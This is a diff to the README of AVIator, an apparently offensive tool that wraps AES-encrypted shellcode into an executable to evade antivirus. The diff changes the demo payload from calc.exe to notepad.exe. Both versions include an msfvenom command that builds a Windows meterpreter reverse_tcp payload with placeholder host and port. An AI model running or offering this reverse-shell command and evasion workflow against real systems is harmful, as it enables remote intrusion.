Ch0pin/AVIator/README.md

 2. A text containing the IV used for AES encryption
 3. A text containing the shellcode

-The shellcode should be provided as a C# byte array.
-The default values contain shellcode that executes calc.exe (32bit).
-This example is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X  LPORT=XXXX -f csharp).
+Important note: The shellcode should be provided as a C# byte array.

+The default values contain shellcode that executes notepad.exe (32bit).
+This demo is provided as an indication of how the code should be formed (using msfvenom, this can be easily done with the -f csharp switch, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X  LPORT=XXXX -f csharp).

 After filling the provided inputs and selecting the output path an executable is generated according to the chosen options.